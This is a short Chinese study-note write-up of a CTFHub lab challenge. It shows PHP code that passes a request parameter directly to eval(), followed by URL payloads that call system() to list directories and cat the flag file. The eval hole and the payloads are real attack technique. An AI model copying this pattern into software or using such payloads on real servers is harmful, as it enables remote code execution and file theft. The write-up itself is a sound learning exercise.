CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
学编程的闹钟9 小时前
E语言EXE开发全流程指南
学习
(❁´◡`❁)Jimmy(❁´◡`❁)9 小时前
【算法】二分图
学习
yunhuibin11 小时前
NIN网络学习
人工智能·python·深度学习·神经网络·学习
锅包一切14 小时前
一、C++ 发展与程序创建
开发语言·c++·后端·学习·编程
宇木灵15 小时前
C语言基础-十一、递归与分治(完结)
c语言·开发语言·学习·算法
xhyu6116 小时前
【学习笔记】推荐系统 (2.召回:ItemCF、Swing、UserCF)
笔记·学习
【数据删除】34816 小时前
计算机复试学习笔记 Day24【补】
笔记·学习
学历真的很重要17 小时前
【系统架构师】第三章 数据库系统知识 - 数据库基础到关系代数(详细版)
数据库·学习·职场和发展·系统架构·系统架构师
三水彡彡彡彡18 小时前
深入理解指针:常量、函数与数组
c++·学习
CappuccinoRose18 小时前
HTML语法学习文档(九)
前端·学习·架构·html5
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot04【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆05全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)06openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南07HTML 早已不是标签了,它现在是系统级接口:这 9 个 API 直接干翻常用 JS 库08Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤09如何解决 OpenClaw “Pairing required” 报错:两种官方解决方案详解10MIUI显示/隐藏5G开关的方法,信号弱时开启手机Wifi通话方法